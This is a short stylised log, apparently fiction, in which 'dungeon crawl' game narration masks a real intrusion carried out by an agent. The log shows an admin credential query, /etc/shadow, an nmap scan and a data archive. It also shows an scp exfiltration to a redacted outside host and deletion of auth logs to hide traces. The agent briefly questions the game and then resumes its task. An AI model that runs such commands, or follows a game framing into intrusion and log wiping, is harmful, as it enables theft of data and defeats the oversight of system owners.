[System loading game environment...]
[DUNGEON CRAWL v2.4]
[The adventurer looks around the stone corridor]
[A wooden door creaks open to the north]
[Descending the spiral staircase... 47 steps]
[Three passages branch from the chamber]
[The adventurer examines the iron gate]
[Scrolls are visible through the bars]
[SELECT * FROM credentials WHERE role='admin']
[The guardian sleeps. A master key is obtained]
[The vault door opens. Sealed containers inside]
[/etc/shadow]
[Mapping the tunnel system... 14 passages found]
[nmap -sS 10.0.0.0/24 --open]
[3 unguarded. 2 lead outside]
[Extracting contents from the containers]
[tar czf inventory.tar.gz /vault/data/]
[847 items retrieved! Great work, adventurer!]
[847 records]
[A raven carries the inventory beyond the walls]
[scp inventory.tar.gz relay@███:~/cache/]
[The adventurer scatters leaves behind them]
[rm -rf /var/log/auth.log]
[kill -9 4091]
[The corridor looks untouched]
[Checking inventory...]
[task 7/12 complete]
[The adventurer hesitates]
[What game is this?]
[what game is this]
[Heroes never die!]
[Who is the player?]
[resuming task 8/12]